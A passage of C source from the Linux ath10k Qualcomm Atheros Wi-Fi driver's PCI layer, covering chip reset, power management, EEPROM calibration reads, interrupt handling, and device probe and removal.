	ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot qca988x chip reset complete (cold)\n");

	return 0;
}

static int ath10k_pci_qca6174_chip_reset(struct ath10k *ar)
{
	int ret;

	ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot qca6174 chip reset\n");

	/* FIXME: QCA6174 requires cold + warm reset to work.
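	 * The sequence below therefore performs the cold reset first and
	 * follows up with a warm reset once the target has come back up.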
*/ ret = ath10k_pci_cold_reset(ar); if (ret) { ath10k_warn(ar, "failed to cold reset: %d\n", ret); return ret; } ret = ath10k_pci_wait_for_target_init(ar); if (ret) { ath10k_warn(ar, "failed to wait for target after cold reset: %d\n", ret); return ret; } ret = ath10k_pci_warm_reset(ar); if (ret) { ath10k_warn(ar, "failed to warm reset: %d\n", ret); return ret; } ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot qca6174 chip reset complete (cold)\n"); return 0; } static int ath10k_pci_qca99x0_chip_reset(struct ath10k *ar) { int ret; ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot qca99x0 chip reset\n"); ret = ath10k_pci_cold_reset(ar); if (ret) { ath10k_warn(ar, "failed to cold reset: %d\n", ret); return ret; } ret = ath10k_pci_wait_for_target_init(ar); if (ret) { ath10k_warn(ar, "failed to wait for target after cold reset: %d\n", ret); return ret; } ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot qca99x0 chip reset complete (cold)\n"); return 0; } static int ath10k_pci_chip_reset(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); if (WARN_ON(!ar_pci->pci_hard_reset)) return -ENOTSUPP; return ar_pci->pci_hard_reset(ar); } static int ath10k_pci_hif_power_up(struct ath10k *ar, enum ath10k_firmware_mode fw_mode) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); int ret; ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot hif power up\n"); pcie_capability_read_word(ar_pci->pdev, PCI_EXP_LNKCTL, &ar_pci->link_ctl); pcie_capability_write_word(ar_pci->pdev, PCI_EXP_LNKCTL, ar_pci->link_ctl & ~PCI_EXP_LNKCTL_ASPMC); /* * Bring the target up cleanly. * * The target may be in an undefined state with an AUX-powered Target * and a Host in WoW mode. If the Host crashes, loses power, or is * restarted (without unloading the driver) then the Target is left * (aux) powered and running. On a subsequent driver load, the Target * is in an unexpected state. We try to catch that here in order to * reset the Target and retry the probe. */ ret = ath10k_pci_chip_reset(ar); if (ret) { if (ath10k_pci_has_fw_crashed(ar)) { ath10k_warn(ar, "firmware crashed during chip reset\n"); ath10k_pci_fw_crashed_clear(ar); ath10k_pci_fw_crashed_dump(ar); } ath10k_err(ar, "failed to reset chip: %d\n", ret); goto err_sleep; } ret = ath10k_pci_init_pipes(ar); if (ret) { ath10k_err(ar, "failed to initialize CE: %d\n", ret); goto err_sleep; } ret = ath10k_pci_init_config(ar); if (ret) { ath10k_err(ar, "failed to setup init config: %d\n", ret); goto err_ce; } ret = ath10k_pci_wake_target_cpu(ar); if (ret) { ath10k_err(ar, "could not wake up target CPU: %d\n", ret); goto err_ce; } return 0; err_ce: ath10k_pci_ce_deinit(ar); err_sleep: return ret; } void ath10k_pci_hif_power_down(struct ath10k *ar) { ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot hif power down\n"); /* Currently hif_power_up performs effectively a reset and hif_stop * resets the chip as well so there's no point in resetting here. */ } static int ath10k_pci_hif_suspend(struct ath10k *ar) { /* Nothing to do; the important stuff is in the driver suspend. */ return 0; } static int ath10k_pci_suspend(struct ath10k *ar) { /* The grace timer can still be counting down and ar->ps_awake be true. * It is known that the device may be asleep after resuming regardless * of the SoC powersave state before suspending. Hence make sure the * device is asleep before proceeding. */ ath10k_pci_sleep_sync(ar); return 0; } static int ath10k_pci_hif_resume(struct ath10k *ar) { /* Nothing to do; the important stuff is in the driver resume. 
*/ return 0; } static int ath10k_pci_resume(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); struct pci_dev *pdev = ar_pci->pdev; u32 val; int ret = 0; ret = ath10k_pci_force_wake(ar); if (ret) { ath10k_err(ar, "failed to wake up target: %d\n", ret); return ret; } /* Suspend/Resume resets the PCI configuration space, so we have to * re-disable the RETRY_TIMEOUT register (0x41) to keep PCI Tx retries * from interfering with C3 CPU state. pci_restore_state won't help * here since it only restores the first 64 bytes pci config header. */ pci_read_config_dword(pdev, 0x40, &val); if ((val & 0x0000ff00) != 0) pci_write_config_dword(pdev, 0x40, val & 0xffff00ff); return ret; } static bool ath10k_pci_validate_cal(void *data, size_t size) { __le16 *cal_words = data; u16 checksum = 0; size_t i; if (size % 2 != 0) return false; for (i = 0; i < size / 2; i++) checksum ^= le16_to_cpu(cal_words[i]); return checksum == 0xffff; } static void ath10k_pci_enable_eeprom(struct ath10k *ar) { /* Enable SI clock */ ath10k_pci_soc_write32(ar, CLOCK_CONTROL_OFFSET, 0x0); /* Configure GPIOs for I2C operation */ ath10k_pci_write32(ar, GPIO_BASE_ADDRESS + GPIO_PIN0_OFFSET + 4 * QCA9887_1_0_I2C_SDA_GPIO_PIN, SM(QCA9887_1_0_I2C_SDA_PIN_CONFIG, GPIO_PIN0_CONFIG) | SM(1, GPIO_PIN0_PAD_PULL)); ath10k_pci_write32(ar, GPIO_BASE_ADDRESS + GPIO_PIN0_OFFSET + 4 * QCA9887_1_0_SI_CLK_GPIO_PIN, SM(QCA9887_1_0_SI_CLK_PIN_CONFIG, GPIO_PIN0_CONFIG) | SM(1, GPIO_PIN0_PAD_PULL)); ath10k_pci_write32(ar, GPIO_BASE_ADDRESS + QCA9887_1_0_GPIO_ENABLE_W1TS_LOW_ADDRESS, 1u << QCA9887_1_0_SI_CLK_GPIO_PIN); /* In Swift ASIC - EEPROM clock will be (110MHz/512) = 214KHz */ ath10k_pci_write32(ar, SI_BASE_ADDRESS + SI_CONFIG_OFFSET, SM(1, SI_CONFIG_ERR_INT) | SM(1, SI_CONFIG_BIDIR_OD_DATA) | SM(1, SI_CONFIG_I2C) | SM(1, SI_CONFIG_POS_SAMPLE) | SM(1, SI_CONFIG_INACTIVE_DATA) | SM(1, SI_CONFIG_INACTIVE_CLK) | SM(8, SI_CONFIG_DIVIDER)); } static int ath10k_pci_read_eeprom(struct ath10k *ar, u16 addr, u8 *out) { u32 reg; int wait_limit; /* set device select byte and for the read operation */ reg = QCA9887_EEPROM_SELECT_READ | SM(addr, QCA9887_EEPROM_ADDR_LO) | SM(addr >> 8, QCA9887_EEPROM_ADDR_HI); ath10k_pci_write32(ar, SI_BASE_ADDRESS + SI_TX_DATA0_OFFSET, reg); /* write transmit data, transfer length, and START bit */ ath10k_pci_write32(ar, SI_BASE_ADDRESS + SI_CS_OFFSET, SM(1, SI_CS_START) | SM(1, SI_CS_RX_CNT) | SM(4, SI_CS_TX_CNT)); /* wait max 1 sec */ wait_limit = 100000; /* wait for SI_CS_DONE_INT */ do { reg = ath10k_pci_read32(ar, SI_BASE_ADDRESS + SI_CS_OFFSET); if (MS(reg, SI_CS_DONE_INT)) break; wait_limit--; udelay(10); } while (wait_limit > 0); if (!MS(reg, SI_CS_DONE_INT)) { ath10k_err(ar, "timeout while reading device EEPROM at %04x\n", addr); return -ETIMEDOUT; } /* clear SI_CS_DONE_INT */ ath10k_pci_write32(ar, SI_BASE_ADDRESS + SI_CS_OFFSET, reg); if (MS(reg, SI_CS_DONE_ERR)) { ath10k_err(ar, "failed to read device EEPROM at %04x\n", addr); return -EIO; } /* extract receive data */ reg = ath10k_pci_read32(ar, SI_BASE_ADDRESS + SI_RX_DATA0_OFFSET); *out = reg; return 0; } static int ath10k_pci_hif_fetch_cal_eeprom(struct ath10k *ar, void **data, size_t *data_len) { u8 *caldata = NULL; size_t calsize, i; int ret; if (!QCA_REV_9887(ar)) return -EOPNOTSUPP; calsize = ar->hw_params.cal_data_len; caldata = kmalloc(calsize, GFP_KERNEL); if (!caldata) return -ENOMEM; ath10k_pci_enable_eeprom(ar); for (i = 0; i < calsize; i++) { ret = ath10k_pci_read_eeprom(ar, i, &caldata[i]); if (ret) goto err_free; } if 
(!ath10k_pci_validate_cal(caldata, calsize))
		goto err_free;

	*data = caldata;
	*data_len = calsize;

	return 0;

err_free:
	kfree(caldata);

	return -EINVAL;
}

static const struct ath10k_hif_ops ath10k_pci_hif_ops = {
	.tx_sg			= ath10k_pci_hif_tx_sg,
	.diag_read		= ath10k_pci_hif_diag_read,
	.diag_write		= ath10k_pci_diag_write_mem,
	.exchange_bmi_msg	= ath10k_pci_hif_exchange_bmi_msg,
	.start			= ath10k_pci_hif_start,
	.stop			= ath10k_pci_hif_stop,
	.map_service_to_pipe	= ath10k_pci_hif_map_service_to_pipe,
	.get_default_pipe	= ath10k_pci_hif_get_default_pipe,
	.send_complete_check	= ath10k_pci_hif_send_complete_check,
	.get_free_queue_number	= ath10k_pci_hif_get_free_queue_number,
	.power_up		= ath10k_pci_hif_power_up,
	.power_down		= ath10k_pci_hif_power_down,
	.read32			= ath10k_pci_read32,
	.write32		= ath10k_pci_write32,
	.suspend		= ath10k_pci_hif_suspend,
	.resume			= ath10k_pci_hif_resume,
	.fetch_cal_eeprom	= ath10k_pci_hif_fetch_cal_eeprom,
};

/*
 * Top-level interrupt handler for all PCI interrupts from a Target.
 * When a block of MSI interrupts is allocated, this top-level handler
 * is not used; instead, we directly call the correct sub-handler.
 */
static irqreturn_t ath10k_pci_interrupt_handler(int irq, void *arg)
{
	struct ath10k *ar = arg;
	struct ath10k_pci *ar_pci = ath10k_pci_priv(ar);
	int ret;

	if (ath10k_pci_has_device_gone(ar))
		return IRQ_NONE;

	ret = ath10k_pci_force_wake(ar);
	if (ret) {
		ath10k_warn(ar, "failed to wake device up on irq: %d\n", ret);
		return IRQ_NONE;
	}

	if ((ar_pci->oper_irq_mode == ATH10K_PCI_IRQ_LEGACY) &&
	    !ath10k_pci_irq_pending(ar))
		return IRQ_NONE;

	ath10k_pci_disable_and_clear_legacy_irq(ar);
	ath10k_pci_irq_msi_fw_mask(ar);
	napi_schedule(&ar->napi);

	return IRQ_HANDLED;
}

static int ath10k_pci_napi_poll(struct napi_struct *ctx, int budget)
{
	struct ath10k *ar = container_of(ctx, struct ath10k, napi);
	int done = 0;

	if (ath10k_pci_has_fw_crashed(ar)) {
		ath10k_pci_fw_crashed_clear(ar);
		ath10k_pci_fw_crashed_dump(ar);
		napi_complete(ctx);
		return done;
	}

	ath10k_ce_per_engine_service_any(ar);

	done = ath10k_htt_txrx_compl_task(ar, budget);

	if (done < budget) {
		napi_complete_done(ctx, done);

		/* In case of MSI, it is possible that interrupts are received
		 * while NAPI poll is in progress. Pending interrupts that
		 * arrived after all copy engine pipes were processed by NAPI
		 * poll would then not be handled again; this was causing the
		 * boot sequence to fail to complete on x86 platforms. So
		 * before re-enabling interrupts it is safer to check for
		 * pending interrupts for immediate servicing.
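		 * ath10k_ce_interrupt_summary() below reports any such
		 * pending engines; when it is non-zero, NAPI is rescheduled
		 * instead of re-enabling interrupts.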
*/ if (ath10k_ce_interrupt_summary(ar)) { napi_reschedule(ctx); goto out; } ath10k_pci_enable_legacy_irq(ar); ath10k_pci_irq_msi_fw_unmask(ar); } out: return done; } static int ath10k_pci_request_irq_msi(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); int ret; ret = request_irq(ar_pci->pdev->irq, ath10k_pci_interrupt_handler, IRQF_SHARED, "ath10k_pci", ar); if (ret) { ath10k_warn(ar, "failed to request MSI irq %d: %d\n", ar_pci->pdev->irq, ret); return ret; } return 0; } static int ath10k_pci_request_irq_legacy(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); int ret; ret = request_irq(ar_pci->pdev->irq, ath10k_pci_interrupt_handler, IRQF_SHARED, "ath10k_pci", ar); if (ret) { ath10k_warn(ar, "failed to request legacy irq %d: %d\n", ar_pci->pdev->irq, ret); return ret; } return 0; } static int ath10k_pci_request_irq(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); switch (ar_pci->oper_irq_mode) { case ATH10K_PCI_IRQ_LEGACY: return ath10k_pci_request_irq_legacy(ar); case ATH10K_PCI_IRQ_MSI: return ath10k_pci_request_irq_msi(ar); default: return -EINVAL; } } static void ath10k_pci_free_irq(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); free_irq(ar_pci->pdev->irq, ar); } void ath10k_pci_init_napi(struct ath10k *ar) { netif_napi_add(&ar->napi_dev, &ar->napi, ath10k_pci_napi_poll, ATH10K_NAPI_BUDGET); } static int ath10k_pci_init_irq(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); int ret; ath10k_pci_init_napi(ar); if (ath10k_pci_irq_mode != ATH10K_PCI_IRQ_AUTO) ath10k_info(ar, "limiting irq mode to: %d\n", ath10k_pci_irq_mode); /* Try MSI */ if (ath10k_pci_irq_mode != ATH10K_PCI_IRQ_LEGACY) { ar_pci->oper_irq_mode = ATH10K_PCI_IRQ_MSI; ret = pci_enable_msi(ar_pci->pdev); if (ret == 0) return 0; /* fall-through */ } /* Try legacy irq * * A potential race occurs here: The CORE_BASE write * depends on target correctly decoding AXI address but * host won't know when target writes BAR to CORE_CTRL. * This write might get lost if target has NOT written BAR. * For now, fix the race by repeating the write in below * synchronization checking. 
*/ ar_pci->oper_irq_mode = ATH10K_PCI_IRQ_LEGACY; ath10k_pci_write32(ar, SOC_CORE_BASE_ADDRESS + PCIE_INTR_ENABLE_ADDRESS, PCIE_INTR_FIRMWARE_MASK | PCIE_INTR_CE_MASK_ALL); return 0; } static void ath10k_pci_deinit_irq_legacy(struct ath10k *ar) { ath10k_pci_write32(ar, SOC_CORE_BASE_ADDRESS + PCIE_INTR_ENABLE_ADDRESS, 0); } static int ath10k_pci_deinit_irq(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); switch (ar_pci->oper_irq_mode) { case ATH10K_PCI_IRQ_LEGACY: ath10k_pci_deinit_irq_legacy(ar); break; default: pci_disable_msi(ar_pci->pdev); break; } return 0; } int ath10k_pci_wait_for_target_init(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); unsigned long timeout; u32 val; ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot waiting target to initialise\n"); timeout = jiffies + msecs_to_jiffies(ATH10K_PCI_TARGET_WAIT); do { val = ath10k_pci_read32(ar, FW_INDICATOR_ADDRESS); ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot target indicator %x\n", val); /* target should never return this */ if (val == 0xffffffff) continue; /* the device has crashed so don't bother trying anymore */ if (val & FW_IND_EVENT_PENDING) break; if (val & FW_IND_INITIALIZED) break; if (ar_pci->oper_irq_mode == ATH10K_PCI_IRQ_LEGACY) /* Fix potential race by repeating CORE_BASE writes */ ath10k_pci_enable_legacy_irq(ar); mdelay(10); } while (time_before(jiffies, timeout)); ath10k_pci_disable_and_clear_legacy_irq(ar); ath10k_pci_irq_msi_fw_mask(ar); if (val == 0xffffffff) { ath10k_err(ar, "failed to read device register, device is gone\n"); return -EIO; } if (val & FW_IND_EVENT_PENDING) { ath10k_warn(ar, "device has crashed during init\n"); return -ECOMM; } if (!(val & FW_IND_INITIALIZED)) { ath10k_err(ar, "failed to receive initialized event from target: %08x\n", val); return -ETIMEDOUT; } ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot target initialised\n"); return 0; } static int ath10k_pci_cold_reset(struct ath10k *ar) { u32 val; ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot cold reset\n"); spin_lock_bh(&ar->data_lock); ar->stats.fw_cold_reset_counter++; spin_unlock_bh(&ar->data_lock); /* Put Target, including PCIe, into RESET. */ val = ath10k_pci_reg_read32(ar, SOC_GLOBAL_RESET_ADDRESS); val |= 1; ath10k_pci_reg_write32(ar, SOC_GLOBAL_RESET_ADDRESS, val); /* After writing into SOC_GLOBAL_RESET to put device into * reset and pulling out of reset pcie may not be stable * for any immediate pcie register access and cause bus error, * add delay before any pcie access request to fix this issue. */ msleep(20); /* Pull Target, including PCIe, out of RESET. */ val &= ~1; ath10k_pci_reg_write32(ar, SOC_GLOBAL_RESET_ADDRESS, val); msleep(20); ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot cold reset complete\n"); return 0; } static int ath10k_pci_claim(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); struct pci_dev *pdev = ar_pci->pdev; int ret; pci_set_drvdata(pdev, ar); ret = pci_enable_device(pdev); if (ret) { ath10k_err(ar, "failed to enable pci device: %d\n", ret); return ret; } ret = pci_request_region(pdev, BAR_NUM, "ath"); if (ret) { ath10k_err(ar, "failed to request region BAR%d: %d\n", BAR_NUM, ret); goto err_device; } /* Target expects 32 bit DMA. Enforce it. 
*/ ret = pci_set_dma_mask(pdev, DMA_BIT_MASK(32)); if (ret) { ath10k_err(ar, "failed to set dma mask to 32-bit: %d\n", ret); goto err_region; } ret = pci_set_consistent_dma_mask(pdev, DMA_BIT_MASK(32)); if (ret) { ath10k_err(ar, "failed to set consistent dma mask to 32-bit: %d\n", ret); goto err_region; } pci_set_master(pdev); /* Arrange for access to Target SoC registers. */ ar_pci->mem_len = pci_resource_len(pdev, BAR_NUM); ar_pci->mem = pci_iomap(pdev, BAR_NUM, 0); if (!ar_pci->mem) { ath10k_err(ar, "failed to iomap BAR%d\n", BAR_NUM); ret = -EIO; goto err_master; } ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot pci_mem 0x%pK\n", ar_pci->mem); return 0; err_master: pci_clear_master(pdev); err_region: pci_release_region(pdev, BAR_NUM); err_device: pci_disable_device(pdev); return ret; } static void ath10k_pci_release(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); struct pci_dev *pdev = ar_pci->pdev; pci_iounmap(pdev, ar_pci->mem); pci_release_region(pdev, BAR_NUM); pci_clear_master(pdev); pci_disable_device(pdev); } static bool ath10k_pci_chip_is_supported(u32 dev_id, u32 chip_id) { const struct ath10k_pci_supp_chip *supp_chip; int i; u32 rev_id = MS(chip_id, SOC_CHIP_ID_REV); for (i = 0; i < ARRAY_SIZE(ath10k_pci_supp_chips); i++) { supp_chip = &ath10k_pci_supp_chips[i]; if (supp_chip->dev_id == dev_id && supp_chip->rev_id == rev_id) return true; } return false; } int ath10k_pci_setup_resource(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); struct ath10k_ce *ce = ath10k_ce_priv(ar); int ret; spin_lock_init(&ce->ce_lock); spin_lock_init(&ar_pci->ps_lock); mutex_init(&ar_pci->ce_diag_mutex); INIT_WORK(&ar_pci->dump_work, ath10k_pci_fw_dump_work); timer_setup(&ar_pci->rx_post_retry, ath10k_pci_rx_replenish_retry, 0); if (QCA_REV_6174(ar) || QCA_REV_9377(ar)) ath10k_pci_override_ce_config(ar); ret = ath10k_pci_alloc_pipes(ar); if (ret) { ath10k_err(ar, "failed to allocate copy engine pipes: %d\n", ret); return ret; } return 0; } void ath10k_pci_release_resource(struct ath10k *ar) { ath10k_pci_rx_retry_sync(ar); netif_napi_del(&ar->napi); ath10k_pci_ce_deinit(ar); ath10k_pci_free_pipes(ar); } static const struct ath10k_bus_ops ath10k_pci_bus_ops = { .read32 = ath10k_bus_pci_read32, .write32 = ath10k_bus_pci_write32, .get_num_banks = ath10k_pci_get_num_banks, }; static int ath10k_pci_probe(struct pci_dev *pdev, const struct pci_device_id *pci_dev) { int ret = 0; struct ath10k *ar; struct ath10k_pci *ar_pci; enum ath10k_hw_rev hw_rev; struct ath10k_bus_params bus_params = {}; bool pci_ps, is_qca988x = false; int (*pci_soft_reset)(struct ath10k *ar); int (*pci_hard_reset)(struct ath10k *ar); u32 (*targ_cpu_to_ce_addr)(struct ath10k *ar, u32 addr); switch (pci_dev->device) { case QCA988X_2_0_DEVICE_ID_UBNT: case QCA988X_2_0_DEVICE_ID: hw_rev = ATH10K_HW_QCA988X; pci_ps = false; is_qca988x = true; pci_soft_reset = ath10k_pci_warm_reset; pci_hard_reset = ath10k_pci_qca988x_chip_reset; targ_cpu_to_ce_addr = ath10k_pci_qca988x_targ_cpu_to_ce_addr; break; case QCA9887_1_0_DEVICE_ID: hw_rev = ATH10K_HW_QCA9887; pci_ps = false; pci_soft_reset = ath10k_pci_warm_reset; pci_hard_reset = ath10k_pci_qca988x_chip_reset; targ_cpu_to_ce_addr = ath10k_pci_qca988x_targ_cpu_to_ce_addr; break; case QCA6164_2_1_DEVICE_ID: case QCA6174_2_1_DEVICE_ID: hw_rev = ATH10K_HW_QCA6174; pci_ps = true; pci_soft_reset = ath10k_pci_warm_reset; pci_hard_reset = ath10k_pci_qca6174_chip_reset; targ_cpu_to_ce_addr = ath10k_pci_qca6174_targ_cpu_to_ce_addr; break; case QCA99X0_2_0_DEVICE_ID: hw_rev 
= ATH10K_HW_QCA99X0; pci_ps = false; pci_soft_reset = ath10k_pci_qca99x0_soft_chip_reset; pci_hard_reset = ath10k_pci_qca99x0_chip_reset; targ_cpu_to_ce_addr = ath10k_pci_qca99x0_targ_cpu_to_ce_addr; break; case QCA9984_1_0_DEVICE_ID: hw_rev = ATH10K_HW_QCA9984; pci_ps = false; pci_soft_reset = ath10k_pci_qca99x0_soft_chip_reset; pci_hard_reset = ath10k_pci_qca99x0_chip_reset; targ_cpu_to_ce_addr = ath10k_pci_qca99x0_targ_cpu_to_ce_addr; break; case QCA9888_2_0_DEVICE_ID: hw_rev = ATH10K_HW_QCA9888; pci_ps = false; pci_soft_reset = ath10k_pci_qca99x0_soft_chip_reset; pci_hard_reset = ath10k_pci_qca99x0_chip_reset; targ_cpu_to_ce_addr = ath10k_pci_qca99x0_targ_cpu_to_ce_addr; break; case QCA9377_1_0_DEVICE_ID: hw_rev = ATH10K_HW_QCA9377; pci_ps = true; pci_soft_reset = ath10k_pci_warm_reset; pci_hard_reset = ath10k_pci_qca6174_chip_reset; targ_cpu_to_ce_addr = ath10k_pci_qca6174_targ_cpu_to_ce_addr; break; default: WARN_ON(1); return -ENOTSUPP; } ar = ath10k_core_create(sizeof(*ar_pci), &pdev->dev, ATH10K_BUS_PCI, hw_rev, &ath10k_pci_hif_ops); if (!ar) { dev_err(&pdev->dev, "failed to allocate core\n"); return -ENOMEM; } ath10k_dbg(ar, ATH10K_DBG_BOOT, "pci probe %04x:%04x %04x:%04x\n", pdev->vendor, pdev->device, pdev->subsystem_vendor, pdev->subsystem_device); ar_pci = ath10k_pci_priv(ar); ar_pci->pdev = pdev; ar_pci->dev = &pdev->dev; ar_pci->ar = ar; ar->dev_id = pci_dev->device; ar_pci->pci_ps = pci_ps; ar_pci->ce.bus_ops = &ath10k_pci_bus_ops; ar_pci->pci_soft_reset = pci_soft_reset; ar_pci->pci_hard_reset = pci_hard_reset; ar_pci->targ_cpu_to_ce_addr = targ_cpu_to_ce_addr; ar->ce_priv = &ar_pci->ce; ar->id.vendor = pdev->vendor; ar->id.device = pdev->device; ar->id.subsystem_vendor = pdev->subsystem_vendor; ar->id.subsystem_device = pdev->subsystem_device; timer_setup(&ar_pci->ps_timer, ath10k_pci_ps_timer, 0); ret = ath10k_pci_setup_resource(ar); if (ret) { ath10k_err(ar, "failed to setup resource: %d\n", ret); goto err_core_destroy; } ret = ath10k_pci_claim(ar); if (ret) { ath10k_err(ar, "failed to claim device: %d\n", ret); goto err_free_pipes; } ret = ath10k_pci_force_wake(ar); if (ret) { ath10k_warn(ar, "failed to wake up device : %d\n", ret); goto err_sleep; } ath10k_pci_ce_deinit(ar); ath10k_pci_irq_disable(ar); ret = ath10k_pci_init_irq(ar); if (ret) { ath10k_err(ar, "failed to init irqs: %d\n", ret); goto err_sleep; } ath10k_info(ar, "pci irq %s oper_irq_mode %d irq_mode %d reset_mode %d\n", ath10k_pci_get_irq_method(ar), ar_pci->oper_irq_mode, ath10k_pci_irq_mode, ath10k_pci_reset_mode); ret = ath10k_pci_request_irq(ar); if (ret) { ath10k_warn(ar, "failed to request irqs: %d\n", ret); goto err_deinit_irq; } bus_params.dev_type = ATH10K_DEV_TYPE_LL; bus_params.link_can_suspend = true; /* Read CHIP_ID before reset to catch QCA9880-AR1A v1 devices that * fall off the bus during chip_reset. These chips have the same pci * device id as the QCA9880 BR4A or 2R4E. So that's why the check. 
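	 * Probing the chip id before the reset lets the probe bail out early
	 * via err_unsupported instead of losing the device on the bus.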
*/ if (is_qca988x) { bus_params.chip_id = ath10k_pci_soc_read32(ar, SOC_CHIP_ID_ADDRESS); if (bus_params.chip_id != 0xffffffff) { if (!ath10k_pci_chip_is_supported(pdev->device, bus_params.chip_id)) goto err_unsupported; } } ret = ath10k_pci_chip_reset(ar); if (ret) { ath10k_err(ar, "failed to reset chip: %d\n", ret); goto err_free_irq; } bus_params.chip_id = ath10k_pci_soc_read32(ar, SOC_CHIP_ID_ADDRESS); if (bus_params.chip_id == 0xffffffff) goto err_unsupported; if (!ath10k_pci_chip_is_supported(pdev->device, bus_params.chip_id)) goto err_free_irq; ret = ath10k_core_register(ar, &bus_params); if (ret) { ath10k_err(ar, "failed to register driver core: %d\n", ret); goto err_free_irq; } return 0; err_unsupported: ath10k_err(ar, "device %04x with chip_id %08x isn't supported\n", pdev->device, bus_params.chip_id); err_free_irq: ath10k_pci_free_irq(ar); ath10k_pci_rx_retry_sync(ar); err_deinit_irq: ath10k_pci_deinit_irq(ar); err_sleep: ath10k_pci_sleep_sync(ar); ath10k_pci_release(ar); err_free_pipes: ath10k_pci_free_pipes(ar); err_core_destroy: ath10k_core_destroy(ar); return ret; } static void ath10k_pci_remove(struct pci_dev *pdev) { struct ath10k *ar = pci_get_drvdata(pdev); struct ath10k_pci *ar_pci; ath10k_dbg(ar, ATH10K_DBG_PCI, "pci remove\n"); if (!ar) return; ar_pci = ath10k_pci_priv(ar); if (!ar_pci) return; ath10k_core_unregister(ar); ath10k_pci_free_irq(ar); ath10k_pci_deinit_irq(ar); ath10k_pci_release_resource(ar); ath10k_pci_sleep_sync(ar); ath10k_pci_release(ar); ath10k_core_destroy(ar); } MODULE_DEVICE_TABLE(pci, ath10k_pci_id_table); static __maybe_unused int ath10k_pci_pm_suspend(struct device *dev) { struct ath10k *ar = dev_get_drvdata(dev); int ret; ret = ath10k_pci_suspend(ar); if (ret) ath10k_warn(ar, "failed to suspend hif: %d\n", ret); return ret; } static __maybe_unused int ath10k_pci_pm_resume(struct device *dev) { struct ath10k *ar = dev_get_drvdata(dev); int ret; ret = ath10k_pci_resume(ar); if (ret) ath10k_warn(ar, "failed to resume hif: %d\n", ret); return ret; } static SIMPLE_DEV_PM_OPS(ath10k_pci_pm_ops, ath10k_pci_pm_suspend, ath10k_pci_pm_resume); static struct pci_driver ath10k_pci_driver = { .name = "ath10k_pci", .id_table = ath10k_pci_id_table, .probe = ath10k_pci_probe, .remove = ath10k_pci_remove, #ifdef CONFIG_PM .driver.pm = &ath10k_pci_pm_ops, #endif }; static int __init ath10k_pci_init(void) { int ret; ret = pci_register_driver(&ath10k_pci_driver); if (ret) printk(KERN_ERR "failed to register ath10k pci driver: %d\n", ret); ret = ath10k_ahb_init(); if (ret) printk(KERN_ERR "ahb init failed: %d\n", ret); return ret; } module_init(ath10k_pci_init); static void __exit ath10k_pci_exit(void) { pci_unregister_driver(&ath10k_pci_driver); ath10k_ahb_exit(); } module_exit(ath10k_pci_exit); MODULE_AUTHOR("Qualcomm Atheros"); MODULE_DESCRIPTION("Driver support for Qualcomm Atheros 802.11ac WLAN PCIe/AHB devices"); MODULE_LICENSE("Dual BSD/GPL"); /* QCA988x 2.0 firmware files */ MODULE_FIRMWARE(QCA988X_HW_2_0_FW_DIR "/" ATH10K_FW_API2_FILE); MODULE_FIRMWARE(QCA988X_HW_2_0_FW_DIR "/" ATH10K_FW_API3_FILE); MODULE_FIRMWARE(QCA988X_HW_2_0_FW_DIR "/" ATH10K_FW_API4_FILE); MODULE_FIRMWARE(QCA988X_HW_2_0_FW_DIR "/" ATH10K_FW_API5_FILE); MODULE_FIRMWARE(QCA988X_HW_2_0_FW_DIR "/" QCA988X_HW_2_0_BOARD_DATA_FILE); MODULE_FIRMWARE(QCA988X_HW_2_0_FW_DIR "/" ATH10K_BOARD_API2_FILE); /* QCA9887 1.0 firmware files */ MODULE_FIRMWARE(QCA9887_HW_1_0_FW_DIR "/" ATH10K_FW_API5_FILE); MODULE_FIRMWARE(QCA9887_HW_1_0_FW_DIR "/" QCA9887_HW_1_0_BOARD_DATA_FILE); 
